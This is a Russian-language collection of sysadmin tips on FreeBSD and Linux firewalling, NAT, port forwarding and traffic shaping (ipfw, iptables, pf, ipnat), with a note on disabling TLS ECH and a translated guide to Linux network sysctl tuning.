Linux: - Перед правилом блокировки нужно вставить "log" правило: iptables -A FORWARD -p tcp -m tcp -s 192.168.0.0/16 --dport 25 \ -j LOG --log-level debug --log-prefix "outgoing mail" iptables -A FORWARD -p tcp -m tcp -s 192.168.0.0/16 --dport 25 -j DROP - Проверить запущены ли в системе klogd и syslogd. - Настроить /etc/syslog.conf на прием kern.debug логов: kern.=debug -/var/log/kernel/info FreeBSD: Добавить ключ log в ipfw, например: ipfw add 1000 deny log tcp from any to 192.168.10.10 22 via fxp0 ipfw add 1000 deny log logamount 0 tcp from any to 192.168.10.10 80 via fxp0 Для ведения логов ядро должно быть собрано с IPFIREWALL_VERBOSE или нужно выставить "sysctl -w net.inet.ip.fw.verbose=1". Далее проверить чтобы в /etc/syslog.conf было упоминание LOG_SECURITY: security.* /var/log/security Через параметр logamount передается число записей которые будет записано в лог, после превышения записи перестанут появляться в логе, до тех пор пока не будет вызвана команда "ipfw resetlog". Максимальное число сообщений можно также установить через sysctl net.inet.ip.fw.verbose_limit. Для отмены лимитирования на число записей, нужно установить атрибут в 0.

Безопасное редактирование правил ipfw FreeBSD Автор: 135all [обсудить]

Для безопасного редактирование правил ipfw рекомендую обратить внимание на скрипт change_rules.sh, находящийся в /usr/share/examples/ipfw. В случае неправильных действий он вернёт старый набор правил, а также сообщит администратору об изменениях в файрволе по почте.

В двух словах про включение NAT и Firewall в ОС FreeBSD (доп. ссылка 1) Автор: hub.ru [комментарии]

Что бы поднять NAT и Firewall на FreeBSD надо: Скомпилировать ядро: Следующие строки нужно включить в /usr/src/sys/i386/conf/GENERIC файл конфигурации: options IPFIREWALL options IPDIVERT options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=10 options DUMMYNET options TCP_DROP_SYNFIN Переходим в директорию /usr/src/ make buildkernel KERNCONF=GENERIC make installkernel KERNCONF=GENERIC Следующие строки можно к примеру включить в rc.conf файл конфигурации: hostname="free" ifconfig_rl0="10.0.0.1" gateway_enable="YES" firewall_enable="YES" firewall_type="open" natd_enable="YES" natd_interface="rl0" natd_flags="-redirect_port tcp 10.0.0.10:80 80" tcp_extensions="NO" tcp_drop_synfin="YES" icmp_drop_redirect="YES" sendmail_enable="NONE" Для удаленного управления нужно добавить следующую строку: sshd_enable="YES" (возможно понадобится скопировать /etc/ssh/ssh_host_dsa_key.pub в /root/.ssh/authorized_keys Следующие строки можно включить в rc.firewall файл конфигурации (секция "open"): [Oo][Pp][Ee][Nn]) oif="rl0" iif="tx0" oip="132.5.7.172" iip="10.0.0.1" lan="10.0.0.0/24" setup_loopback # allow all for LAN ${fwcmd} add 500 pass all from ${lan} to ${iip} via ${iif} ${fwcmd} add 550 pass all from ${iip} to ${lan} via ${iif} # download - 60K upload - 6K for all lan ip's ${fwcmd} add 600 pipe 1 ip from any to any in via ${oif} ${fwcmd} add 650 pipe 2 ip from any to any out via ${oif} # for selected ip's only # ${fwcmd} add 601 pipe 1 all from any to 10.0.0.10 # ${fwcmd} add 651 pipe 2 all from 10.0.0.10 to any ${fwcmd} pipe 1 config bw 512Kbit/s ${fwcmd} pipe 2 config bw 48Kbit/s # dns setup ${fwcmd} add 770 pass tcp from any to ${oip} 53 setup ${fwcmd} add 780 pass udp from any domain to any ${fwcmd} add 790 pass udp from any to any domain # main setup ${fwcmd} add 800 pass tcp from any http,https,20-21,989-990 to any ${fwcmd} add 810 pass tcp from any to any http,https,20-21,989-990 ${fwcmd} add 830 pass tcp from any pop3,pop3s,smtp,imap,imaps,aol to any ${fwcmd} add 840 pass tcp from any to any pop3,pop3s,smtp,imap,imaps,aol ${fwcmd} add 65000 deny ip from any to any ;; Где oip, oif - внешний интерфейс; iip, iif - внутренний; lan - внутренняя сеть. Такая конфигурация ipfw весьма параноидальна, и здесь приведена только в качестве примера. На практике обычно нужен более открытый фаервол.

pf и трансляция адресов на двух интерфейсах Автор: DelGod [комментарии]

Решение оптимизировано для шлюза на флешке (не используется perl и другие "тяжелые" решения) ------------------------- /usr/local/etc/rc.d/openvpn.sh ------------------------- #!/bin/sh . /etc/rc.subr name=openvpn rcvar=`set_rcvar` prefix="/usr/local" openvpn_precmd() { for i in $openvpn_if ; do # FreeBSD <= 5.4 does not know kldstat's -m option # FreeBSD >= 6.0 does not add debug.* sysctl information # in the default build - we check both to keep things simple if ! sysctl debug.if_${i}_debug >/dev/null 2>&1 \ && ! kldstat -m if_${i} >/dev/null 2>&1 ; then if ! kldload if_${i} ; then warn "Could not load $i module." return 1 fi fi done return 0 } start_postcmd() { `/bin/cat /var/db/ukr_nets| /usr/bin/awk '{ if ($1) {system("route add "$1" 193.201.61.65 >/dev/null")} }'` /bin/sleep 10 && pfctl -F all -f /etc/pf.conf_openvpn } stop_postcmd() { `/bin/cat /var/db/ukr_nets| /usr/bin/awk '{ if ($1) {system("route delete "$1" 193.201.61.65 >/dev/null")} }'` pfctl -F all -f /etc/pf.conf rm -f "$pidfile" || warn "Could not remove $pidfile." } extra_commands="reload" pidfile="/var/run/${name}.pid" command="/usr/local/sbin/${name}" start_precmd="openvpn_precmd" start_postcmd="start_postcmd" stop_postcmd="stop_postcmd" load_rc_config ${name} : ${openvpn_enable="NO"} : ${openvpn_flags=""} : ${openvpn_if=""} : ${openvpn_configfile="${prefix}/etc/openvpn/openvpn.conf"} : ${openvpn_dir="${prefix}/etc/openvpn"} required_files="${openvpn_configfile}" command_args="--cd ${openvpn_dir} --daemon --config ${openvpn_configfile} --writepid ${pidfile}" run_rc_command "$1" ------------------------- /etc/pf.conf ------------------------- ext_if_t="rl0" int_if="rl1" table <users> persist { 192.168.1.0/24 } nat on $ext_if_t inet from <users> to any -> $ext_if_t pass on $ext_if_t all pass on $int_if all ------------------------- /etc/pf.conf_openvpn ------------------------- ext_if_o="tap0" ext_if_t="rl0" int_if="rl1" table <users> persist { 192.168.1.0/24 } table <ukr> persist file "/var/db/ukr_nets" nat on $ext_if_t inet from <users> to <ukr> -> $ext_if_t nat on $ext_if_o inet from <users> to !<ukr> -> $ext_if_o pass on $ext_if_o all pass on $ext_if_t all pass on $int_if all ------------------------- cron: ------------------------- 0 0 * * * /usr/bin/fetch -q -o "/var/db/ukr_nets" 'http://www.colocall.net/ua/?list'

FreeBSD 5.3 ipfw правило по умолчанию Автор: else [комментарии]

В прежних версиях FreeBSD изменить правило по умолчанию 65535 deny ip from any to any на allow ip from any to any можно было включением в ядро опции IPFIREWALL_DEFAULT_TO_ACCEPT. В версии 5.3 это не работает. Даже собрав ядро с этой опцией, получаем правило по умолчанию deny ip from any to any. Если сборка производится удаленно - сюрприз может оказаться довольно неприятным.

Проброс портов с двух различных gateway на внутренний сервер через IPNAT Автор: Жека [комментарии]

Иногда необходимо пробросить порты с двух различных gateway GW1 и GW2 на один внутренний сервер, у которого в качестве default GW указан GW1. Прямой проброс и NAT невозможен, т.к. пакеты пришедшие из GW2 попытаются вернуться по маршруту через GW1. Есть следующий выход, это двойной NAT на GW2, при котором запрос приходит не снаружи, а с внутреннего IP. ed0 - внешний интерфейс lnc0 - интерфейс смотрящий внутрь. в ipnat.rules нужно прописать следующее: map ed0 10.6.10.0/24 -> 0.0.0.0/32 мапим локалку наружу map lnc0 0.0.0.0/0 -> 0.0.0.0/32 ремап внешних ip в локальные rdr ed0 0.0.0.0/0 port 80 -> 10.6.10.2 port 80 tcp форвард на внутренний сервер

Как с помощью ipfw отрезать баннеры в ICQ Автор: orm_vartis [комментарии]

Мысль простая: Аська сообщениями по 5190 и другим портам обменивается, а баннеры только с определенных IP с 80го порта качает по HTTP ... Когда я на это наткнулся, написал скрипт такого содержания: #!/bin/sh # add this rule to your firewall and : # ipfw deny tcp from 192.168.0.0/16 to table(1) out via rl0 setup dst-port 80 NETS=" 64.12.164 64.12.174 152.163.208 205.188.165 205.188.248 205.188.250 " IPS=" 25 57 121 153 185 245 " fwcmd=" ipfw " tablenum=" 1 " #Flushing table ${fwcmd} table ${tablenum} flush #Add tables ips for D1 in ${NETS} do for D2 in ${IPS} do ${fwcmd} table ${tablenum} add ${D1}.${D2} done done И в firewall воткнул правило вида ipfw deny tcp from any to table$1$ out via rl0 setup dst-port 80 Где rl0 - внешний интерфейс. Правильнее, конечно настроить squid и резать банеры на нем - но так проще и быстрее. К тому же заметно меньше грузит машину.

Как разделить канал между пользователями используя ipfw. (доп. ссылка 1) Автор: mgear [обсудить]

/sbin/ipfw pipe 1 config bw 7000Kbit/s /sbin/ipfw queue 1 config pipe 1 weight 75 mask dst-ip 0x00000000 /sbin/ipfw queue 2 config pipe 1 weight 50 mask dst-ip 0x00000000 /sbin/ipfw queue 3 config pipe 1 weight 50 mask dst-ip 0x00000000 /sbin/ipfw queue 4 config pipe 1 weight 50 mask dst-ip 0x00000000 /sbin/ipfw add queue 1 ip from any to 192.168.0.0/24 /sbin/ipfw add queue 2 ip from any to 192.168.1.0/24 /sbin/ipfw add queue 3 ip from any to 192.168.2.0/24 /sbin/ipfw add queue 4 ip from any to 192.168.3.0/24 Итого имеем: одну толстую трубу на 7К и 4 очереди в нее. У первой приоритет 75% канала. У остальных - по 50%

Установка IPFW2 на FreeBSD Автор: Tigran Parsadanian [комментарии]

Собираем библиотеки и сам IPFW: cd /usr/src/lib/libalias make -DIPFW2 && make install cd /usr/src/sbin/ipfw make -DIPFW2 && make install Пересобираем ядро с "options IPFW2" и опциями по вкусу: options IPFIREWALL #firewall options IPFIREWALL_VERBOSE #enable logging to syslogd(8) options IPFIREWALL_FORWARD #enable transparent proxy support options IPFIREWALL_VERBOSE_LIMIT=100 #limit verbosity options IPFIREWALL_DEFAULT_TO_ACCEPT #allow everything by default options DUMMYNET options IPFW2 Делаем reboot и проверяем например командой "ipfw show"

Как в FreeBSD перебросить соединение через NAT во внутреннюю сеть (доп. ссылка 1) Автор: spanka [комментарии]

Вот реализация для ipfw: if1IP="ип_смотрящий_в_инет", if1="интерфейс_смотрящий_в_инет" ifLIP="ип_на_который хотим делать редирект" ipfw add divert natd tcp from any to ${if1IP} 80 via ${if1} ipfw add divert natd ip from any to ${ifLIP} to any via ${if1} ipfw add allow tcp from any to ${if1IP} 80 via any natd -n ${if1} -redirect_port tcp ${ifLIP}:80 80 Решение от miaso <torov@wipline.ru>: tproxy -s 80 -r nobody -l /var/log/transparent_proxy.log [int_ip] 80

Как разрешить или запретить выполнение следующих ipfw правил после встречи dummynet pipe [комментарии]

Завершить выполнение цепочки ipfw правил после попадания в pipe: sysctl -w net.inet.ip.fw.one_pass=1 Продолжить выполнение следующих ipfw правил после попадания в pipe: sysctl -w net.inet.ip.fw.one_pass=0

Как правильно зафильтровать ICMP через FreeBSD ipfw (доп. ссылка 1) Автор: Nikola_SPb [комментарии]

Расшифровка кодов ICMP сообщений: echo reply (0), destination unreachable (3), source quench (4), redirect (5), echo request (8), router adver-tisement (9), router solicitation(10), time-to-live exceeded (11), IP header bad (12), timestamp request (13), timestamp reply (14), information request (15), information reply (16), address mask request (17) and address mask reply (18). ${fwcmd} add 00300 allow icmp from any to внешний_IP in via внешний_интерфейс icmptype 0,3,4,11,12 ${fwcmd} add 00301 allow icmp from внешний_IP to any out via внешний_интерфейс icmptype 3,8,12 ${fwcmd} add 00304 allow icmp from внешний_IP to any out via внешний_интерфейс frag ${fwcmd} add 00305 deny log icmp from any to any in via внешний_интерфейс

Как организовать редирект порта на внутреннюю машину через ipnat в FreeBSD. [комментарии]

man 5 ipnat в /etc/ipnat.conf: rdr fxp0 205.15.63.3/32 port 80 -> 192.168.1.1 port 80 tcp # Базансировка нагрузки между 2 IP: rdr le0 203.1.2.3/32 port 80 -> 203.1.2.3,203.1.2.4 port 80 tcp round-robin

Как у ipfilter обнулить статистику без перезагрузки ? [обсудить]

ipf -z -f my_ipfilter_rules_file

Как в ipfw если выполнилось условие, пропустить следующие N правил. [обсудить]

ipfw add 50 skipto 100 tcp from any to 1.2.3.4 ipfw add 60 ..... ipfw add 100 .....

Пример ограничения полосы пропускания трафика в FreeBSD [комментарии]

Собираем ядро с опциями: options DUMMYNET options IPFIREWALL Ограничиваем трафик для сеток 1.1.1.0/24 и 3.3.3.0/24 на 14000 кбит/с: ipfw add pipe 50 tcp from any to 1.1.1.0/24 via fxp0 ipfw add pipe 50 tcp from any to 3.3.3.0/24 via fxp0 ipfw pipe 50 config bw 14Kbit/s Для внесения задержки на N ms, используйте delay N после config. Для установки веса данного пайпа по отношению к другим пайпам используйте weight вес. Для WF2Q ограничения трафика используйте ipfw queue (queue N config [pipe pipe_nr] [weight weight] [queue {slots | size}) PS (комментарий от gara@mail.ru): Если возникает необходимость организовать "канал" для каждого пользователя из данной сети то пишем: ipfw pipe 10 config mask dst-ip 0x000000ff bw 1024bit/s queue ipfw add pipe 10 tcp from any to 1.1.1.0/24 via fxp0 Теперь каждый хост из сети 1.1.1.0/24 имеет свой канал 1024bit/s

Можно ли отфильтровывать пакеты (вести лог) в зависимости от UID пользователя ? [обсудить]

Для FreeBSD: ipfw add count tcp from any to not 192.168.1.0/24 uid 231 uid user (или gid group) - под правило попадают все TCP или UDP пакеты посланный или принятые пользователем user (группой group). В Linux в ядрах 2.4.x в iptables можно использовать модуль owner.

Как запретить открывать более 30 соединений с одного IP [комментарии]

Запретим более 30 коннектов для 80 порта сервера 1.2.3.4. ipfw add allow tcp from any to 1.2.3.4 80 limit src-addr 30 ipfw add allow tcp from any to 1.2.3.4 80 via fxp0 setup limit src-addr 10 Вместо src-addr можно использовать src-port, dst-addr, dst-port Конструкция работает в последних версиях FreeBSD 4.x ветки.

Как обеспечить работу active FTP режима в FreeBSD NAT [обсудить]

В ipnat воспользуйтесь модулем ftp proxy: map fxp0 0/0 -> 0/32 proxy port ftp ftp/tcp map rl0 172.16.33.0/24 -> 212.46.231.50/32 proxy port ftp ftp/tcp не забудьте поместить правило трансляции ftp перед общим правилом трансляции, порядок следования правил важен.

Как запустить трансляцию адресов (NAT) под FreeBSD [комментарии]

В /etc/rc.conf: ipnat_enable="YES" В /etc/ipnat.rules: Трансляция адресов (NAT): map ppp0 172.16.1.0/24 -> 194.46.124.53/32 где, ppp0 - внешний интерфейс, 172.16.1.0/24 - внутренние IP, 194.46.124.53 - реальный IP внешнего интерфейса. Переброс порта во внутреннюю сеть: rdr ed0 294.16.9.6/32 port 8080 -> 192.168.0.7 port 8080 tcp где, ed0 - внешний интерфейс, 294.16.9.6 - реальный IP внешнего интерфейса, на который нужно обращаться из вне. 192.168.0.7 - внутренний IP на который делается переброс. 8080 - номер перебрасываемого порта. Перечитать: ipnat -CF -f /etc/ipnat.rules

Как организовать Policy Routing на FreeBSD [комментарии]

ipfw add 100 fwd 10.0.0.2 ip from 10.0.2.0/24 to any Если нужно использовать 2 шлюза, то можно воспользоваться: ipfw add fwd $ext_gw_ip ip from $ext_net to any out xmit $ext_int

Автоматическая нумерация правил ipfw в FreeBSD (доп. ссылка 1) Автор: Дмитрий Новиков [комментарии]

Для автоматической нумерации правил ipfw мы применяем следующий несложный прием: C=300 # начальное значение STEP=100 # Шаг увеличения ipfw add $C $(C=$(($C+$STEP))) allow ip from 10.128.0.0/16 to 10.128.0.0/16 ipfw add $C $(C=$(($C+$STEP))) allow ip from 195.131.31.0/24 to 195.131.31.0/24

Проблемы работы сети

Как отключить TLS-расширение ECH для решения проблем с Cloudflare в РФ [комментарии]

Роскомнадзор начал блокировать в РФ соединения к сайтам, использующим TLS-расширение ECH (Encrypted Client Hello). Блокировка привела к массовым проблемам с сайтами, работающими через сеть доставки контента Cloudflare, которую используют примерно 19% всех сайтов в интернете (по другим данным 16% (31 млн) активных сайтов или 23.83% из миллиона самых популярных сайтов). О масштабе сбоев можно судить хотя бы по тому, что из-за блокировки ECH была нарушена работа сайта самого Роскомнадзора, на котором для загрузки шрифтов использовался сервис webfontfree.com, работающий через Cloudflare (первая попытка открытия rkn.gov.ru приводила к минутному зависанию до истечения таймаута). ECH продолжает развитие TLS-расширений SNI и ESNI (Encrypted Server Name Indication) и предназначен для шифрования информации о параметрах TLS-сеансов, таких как запрошенное доменное имя. Если без ECH на стороне интернет-провайдера можно выборочно фильтровать HTTPS-трафик и анализировать какие сайты открывает пользователь, то ECH позволяет добиться полной конфиденциальности при применении HTTPS при обращении к сайтам, использующим сети доставки контента с поддержкой ECH. После включения поддержки ECH в Cloudflare Роскомнадзор потерял возможность блокировать сайты, использующие данную сеть доставки контента, и поэтому просто начал блокировать HTTPS-запросы с ECH (судя по всему блокировка ECH пока ограничивается отдельными подсетями Cloudflare). На стороне пользователя в Firefox доступ к сайтам, работающим через Cloudflare, можно решить двумя путями: * отключить настройки network.dns.echconfig.enabled и network.dns.http3_echconfig.enabled на странице about:config * отключить использование протокола TLS 1.3 выставив в about:config параметр security.tls.version.max в значение "3". При этом может быть нарушена работа с серверами, поддерживающими только протокол TLS 1.3 и отключившими поддержку TLS 1.2. В Chrome раньше ECH можно было отключить через параметр chrome://flags#encrypted-client-hello, но с февраля этого года он удалён и ECH всегда включён по умолчанию. Для отключения ECH в Chrome обходным путём можно создать файл /etc/opt/chrome/policies/managed/conf.json c содержимым: { "EncryptedClientHelloEnabled": false } Владельцы сайтов, использующих Cloudflare, могут отключить ECH в личном кабинете dash.cloudflare.com в секции "SSL > Edge Certificates > Encrypted ClientHello (ECH)". Если тарифный план не предусматривает возможность изменения данной настройки через web-интерфейс, для отключения ECH можно использовать API: curl -X PATCH "https://api.cloudflare.com/client/v4/zones/ID_ZONE/settings/ech" -H "X-Auth-Key: YOUR_GLOBAL_API_KEY" -H "X-Auth-Email: YOUR_EMAIL" -H "Content-Type: application/json" --data '{"id":"ech","value":"off"}'

Часто используемые параметры sysctl, касающиеся настройки сети в Linux (доп. ссылка 1) Автор: zersh [комментарии]

От переводчика (@zersh). Это адаптированный перевод работы https://github.com/leandromoreira/linux-network-performance-parameters Для понимания некоторых моментов использовалась статья. Принимаются любые замечания и предложения. Спасибо zizmo и @servers(Artem) - за помощь и конструктивную критику) Лицензия: BSD-3 Введение Иногда люди пытаются найти некие универсальные значения параметров sysctl (https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt), применение которых во всех случаях позволит добиться и высокой пропускной способности, и низкой задержки при обработке сетевых запросов. К сожалению, это не возможно, хотя стоит отметить, что современные версии ядер по умолчанию уже неплохо настроены. Важно понимать, что изменение заданных по умолчанию настроек может ухудшить производительность (https://medium.com/@duhroach/the-bandwidth-delay-problem-c6a2a578b211). Это краткое руководство, в котором приведены часто используемые параметры sysctl, касающиеся настройки сети Linux, вдохновлённый иллюстрированным руководством по сетевому стеку Linux (https://blog.packagecloud.io/eng/2016/10/11/monitoring-tuning-linux-networking-stack-receiving-data-illustrated/) и многими постами Marek Majkowski (https://blog.cloudflare.com/how-to-achieve-low-latency/). Обзор сетевых очередей Linux Связь переменных sysctl с различными стадиями обработки сетевых потоков в Linux Входящие пакеты (Ingress) 1. Пакеты прибывают в NIC (сетевой адаптер) 2. NIC проверяет `MAC` (если не включён promiscuous-режим) и `FCS (Frame check sequence)` и принимает решение отбросить пакет или продолжить обработку. 3. NIC используя DMA (https://en.wikipedia.org/wiki/Direct_memory_access), помещает пакеты в RAM регионе, ранее подготовленном (mapped) драйвером. 4. NIC ставит ссылки в очередь на пакеты при получении ring buffer (https://en.wikipedia.org/wiki/Circular_buffer) очередь `rx` до истечения таймаута `rx-usecs` или `rx-frames` 5. NIC Генерируется аппаратное прерывание, чтобы система узнала о появлении пакета в памяти `hard IRQ` 6. CPU запустит `IRQ handler`, который запускает код драйвера 7. Драйвер вызовет `планировщик NAPI`, очистит `hard IRQ` 8. Драйвер будит подсистему NAPI с помощью `soft IRQ (NET_RX_SOFTIRQ)` 9. NAPI опрашивает данные, полученные из кольцевого буфера до тех пор пока не истечёт таймаут `netdev_budget_usecs`, или `netdev_budget` и `dev_weight` пакета 10. Linux также выделяет память для `sk_buff` 11. Linux заполняет метаданные: протокол, интерфейс, устанавливает MAC-адрес (setmacheader), удаляет ethernet 12. Linux передаёт skb (данные) в стэк ядра (`netif_receive_skb`) 13. Установит сетевые заголовки, клонирует `skb` ловушкам (вроде tcpdump) и передаст на вход 14. Пакеты обрабатываются в qdisc (Queueing discipline) размера `netdev_max_backlog`, алгоритм которого определяется `default_qdisc` 15. Вызывает `ip_rcv` и пакеты обрабатываются в IP 16. Вызывает netfilter (`PREROUTING`) 17. Проверяет маршрутизацию, кому предназначен пакет: переслать (forwarding) или локально (local) 18. Если локально, вызывает netfilter (`LOCAL_IN`) 19. Это вызовет протокол L4 (для примера `tcp_v4_rcv`) 20. Находит нужный сокет 21. Переходит на конечный автомат tcp (finite state machine). 22. Поставит пакет в входящий буфер, размер которого определяется правилами `tcp_rmem`. Если `tcp_moderate_rcvbuf` включён, ядро будет автоматически тюнить буфер приёма (receive) 23. Ядро сигнализирует приложению, что доступны данные (epoll или другая polling-система) 24. Приложение просыпается и читает данные Исходящие пакеты (Egress) 1. Приложение отправляет сообщение (`sendmsg` или другие) 2. TCP-стек выделяет память для skb_buff 3. Помещает skb в сокет буфера, размером `tcp_wmem` 4. Создаст TCP заголовки (источник и порт назначения, контрольная сумма) 5. Вызывает обработчик L3 (в данном случае `ipv4` в `tcp_write_xmit` и `tcp_transmit_skb`) 6. L3 (`ip_queue_xmit`) построит заголовок IP и вызовет netfilter (`LOCAL_OUT`) 7. Вызывает действие выходного маршрута (Calls output route action) 8. Вызывает netfilter (`POST_ROUTING`) 9. Фрагментирует пакет (`ip_output`) 10. Вызывает функции отправки L2 (`dev_queue_xmit`) 11. Подаёт на выход (QDisc) очередь длинной `txqueuelen` с алгоритмом `default_qdisc` 12. Код драйвера помещает пакеты в `ring buffer tx` 13. Драйвер генерирует `soft IRQ (NET_TX_SOFTIRQ)` после `tx-usecs` таймаута или `tx-frames` 14. Реактивирует аппаратное прерывание (IRQ) в NIC 15. Драйвер отражает (map) все пакеты (для отправки) в некоторую область DMA 16. NIC получит пакеты (через DMA) из RAM для передачи 17. После передачи NIC поднимет сигнал `hard IRQ` о его завершении 18. Драйвер обработает это прерывание IRQ (выключает) 19. И планирует (`soft IRQ`) NAPI poll system 20. NAPI будет обрабатывать сигналы приёма пакетов и освобождать ОЗУ Для отслеживания обработки событий, связанных с выполнением сетевой операции, можно использовать команду: perf trace --no-syscalls --event 'net:*' ping globo.com -c1 > /dev/null Что, Почему и Как - сеть и sysctl параметры Кольцевой буфер (Ring Buffer) - rx, tx Что: драйвер очереди приёма/отправки одной или нескольких очередей с фиксированным размером, обычно реализованный как FIFO, находится в ОЗУ Почему: буфер для плавного прима соединений без их отбрасывания. Возможно, вам понадобится увеличить эти очереди, когда вы увидите сбросы (drops) или переполнения, то есть, если поступает больше пакетов, чем ядро может обработать. Побочным эффектом от увеличения буфера может стать увеличение задержки. Как: Команда проверки: ethtool -g ethX Как изменить: ethtool -G ethX rx значение tx значение Как мониторить: ethtool -S ethX | grep -e "err" -e "drop" -e "over" -e "miss" -e "timeout" -e "reset" -e "restar" -e "collis" -e "over" | grep -v "\: 0" Слияние прерываний (Interrupt Coalescence - IC) - rx-usecs, tx-usecs, rx-frames, tx-frames (аппаратные IRQ) Что: количество микросекунд / кадров, ожидающих перед поднятием hard IRQ, с точки зрения сетевого адаптера это будет пакеты данных DMA до этого тайм-аута / количества кадров Почему: сокращение использования CPUs, аппаратных IRQ, может увеличить пропускную способность за счет задержки. Как: Команда проверки: ethtool -c ethX Как изменить: ethtool -C ethX rx-usecs value tx-usecs value Как мониторить: cat /proc/interrupts Объединение прерываний (soft IRQ) и управления сетевыми очередями QDisc входящих пакетов (ingress). Что: максимальное число микросекунд в одном NAPI (https://en.wikipedia.org/wiki/New_API) цикле опроса. Опрос завершится когда, либо `netdev_budget_usecs` истечёт по временя цикла опроса или количество обработанных пакетов достигнет `netdev_budget`. Почему: вместо того чтобы обрабатывать кучу softIRQ, драйвер сохраняет данные в пуле (polling data); следите за состояниями `dropped` (число пакетов, отброшенных из-за того, что `netdev_max_backlog` был превышен) и `squeezed` (число раз когда ksoftirq превысил `netdev_budget`). Как: Команда проверки: sysctl net.core.netdev_budget_usecs Как изменить: sysctl -w net.core.netdev_budget_usecs value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `netdev_budget` максимальное количество пакетов, взятых со всех интерфейсов за один цикл опроса (NAPI poll). В одном цикле опроса интерфейсы, которые зарегистрированы для опроса, зондируются круговым способом. Кроме того, цикл опроса не может превышать `netdev_budget_usecs` микросекунд, даже если `netdev_budget` не был исчерпан. Как: Команда проверки: sysctl net.core.netdev_budget Как изменить: sysctl -w net.core.netdev_budget value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `dev_weight` максимальное количество пакетов, которое ядро может обработать при прерывании NAPI, это переменная для каждого процессора. Для драйверов, которые поддерживают LRO или GRO_HW, аппаратно агрегированный пакет считается в этом пакете одним. Как: Команда проверки: sysctl net.core.dev_weight Как изменить: sysctl -w net.core.dev_weight value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `netdev_max_backlog` максимальное количество пакетов, находящихся в очереди на стороне INPUT (входной qdisc_), когда интерфейс получает пакеты быстрее, чем ядро может их обработать. Как: Команда проверки: sysctl net.core.netdev_max_backlog Как изменить: sysctl -w net.core.netdev_max_backlog value Как мониторить: cat /proc/net/softnet_stat или скриптом. Исходящие QDisc - txqueuelen (длина очереди tx) и default_qdisc Что: `txqueuelen` максимальное количество пакетов, поставленных в очередь на стороне вывода. Почему: buffer/queue появление разрывов соединений, а также примением контроля трафика tc (traffic control). Как: Команда проверки: ifconfig ethX Как изменить: ifconfig ethX txqueuelen value Как мониторить: ip -s link Что: `default_qdisc` дисциплина очереди по умолчанию, используемая для сетевых устройств. Почему: Каждое приложение имеет разную нагрузку и требует контроля трафика, оно также используется для борьбы с излишней сетевой буферизацией bufferbloat. Как: Команда проверки: sysctl net.core.default_qdisc Как изменить: sysctl -w net.core.default_qdisc value Как мониторить: tc -s qdisc ls dev ethX Буферы/очереди чтения и записи (TCP Read and Write Buffers/Queues) Что: `tcp_rmem` - min (минимальный размер доступный при создании сокета), default (начальный размер), max (максимальный размер) - максимальный размер приёмного буфера TCP. Почему: буфер/очередь приложения для записи/отправки данных. Понять последствия может помочь статья https://blog.cloudflare.com/the-story-of-one-latency-spike/ Как: Команда проверки: sysctl net.ipv4.tcp_rmem Как изменить: sysctl -w net.ipv4.tcp_rmem="min default max" когда меняете значение по умолчанию, не забудьте перезагрузить приложения в пользовательском окружении (т.е. ваш веб-сервер, nginx, и т.п.) Как мониторить: cat /proc/net/sockstat Что: `tcp_wmem` - min (минимальный размер доступный при создании сокета), default (начальный размер), max (максимальный размер) - размер буфера отправки, используемого сокетами TCP. Как: Команда проверки: sysctl net.ipv4.tcp_wmem Как изменить: sysctl -w net.ipv4.tcp_wmem="min default max" когда меняете значение по умолчанию, не забудьте перезагрузить приложения в пользовательском окружении (т.е. ваш веб-сервер, nginx, и т.п.) Как мониторить: cat /proc/net/sockstat Что: `tcp_moderate_rcvbuf` - если установлено, TCP выполняет автонастройку приёмного буфера, пытаясь автоматически определить размер буфера. Как: Команда проверки: sysctl net.ipv4.tcp_moderate_rcvbuf Как изменить: sysctl -w net.ipv4.tcp_moderate_rcvbuf value Как мониторить: cat /proc/net/sockstat TCP FSM и алгоритм перегрузки (Honorable mentions - TCP FSM and congestion algorithm)
`sysctl net.core.somaxconn` - обеспечивает верхний предел значения параметра backlog, передаваемого в функцию `listen()` (https://eklitzke.org/how-tcp-sockets-work), известный пользователям как `SOMAXCONN`. Если вы меняете это значение, вы также должны изменить в своём приложении совместимые значения (т.е. nginx backlog).
`cat /proc/sys/net/ipv4/tcp_fin_timeout` - указывает количество секунд ожидания окончательного пакета FIN, прежде чем сокет будет принудительно закрыт. Это строго является нарушением спецификации TCP, но требуется для предотвращения атак типа "отказ в обслуживании".
`cat /proc/sys/net/ipv4/tcp_available_congestion_control` - показывает доступные варианты управления перегрузкой, которые зарегистрированы.
`cat /proc/sys/net/ipv4/tcp_congestion_control` - устанавливает алгоритм управления перегрузкой, используемое для новых соединений.
`cat /proc/sys/net/ipv4/tcp_max_syn_backlog` - задаёт максимальное число запросов подключения в очереди, которые еще не получили подтверждения от подключающегося клиента; если это число будет превышено, ядро начнёт отбрасывать запросы.
`cat /proc/sys/net/ipv4/tcp_syncookies` - включён/выключен [syn cookies](https://en.wikipedia.org/wiki/SYN_cookies), полезен для защиты от syn flood атак (https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/).
`cat /proc/sys/net/ipv4/tcp_slow_start_after_idle` - включён/выключен медленный старт tcp. Как мониторить: общая сводка netstat -atn | awk '/tcp/ {print $6}' | sort | uniq -c счётчики по определённому состоянию: `established`, `syn-sent`, `syn-recv`, `fin-wait-1`, `fin-wait-2`, `time-wait`, `closed`, `close-wait`, `last-ack`, `listening`, `closing`: ss -neopt state time-wait | wc -l` tcp статистика netstat -st более читаемая tcp статистика nstat -a обобщённая статистика сокетов cat /proc/net/sockstat детальная статистика, описание полей смотрите: https://www.kernel.org/doc/Documentation/networking/proc_net_tcp.txt cat /proc/net/tcp `ListenOverflows` и `ListenDrops` - важные поля для наблюдения cat /proc/net/netstat читаемый вариант /proc/net/netstat (https://sa-chernomor.livejournal.com/9858.html) cat /proc/net/netstat | awk '(f==0) { i=1; while ( i<=NF) {n[i] = $i; i++ }; f=1; next} \ (f==1){ i=2; while ( i<=NF){ printf "%s = %d\n", n[i], $i; i++}; f=0} ' | grep -v "= 0 Источник: https://commons.wikimedia.or/wiki/File:Tcp_state_diagram_fixed_new.svg Сетевые утилиты для тестирования и мониторинга
iperf3 (https://iperf.fr/) - пропускная способность сети
vegeta (https://github.com/tsenart/vegeta) - нагрузочное тестирование HTTP
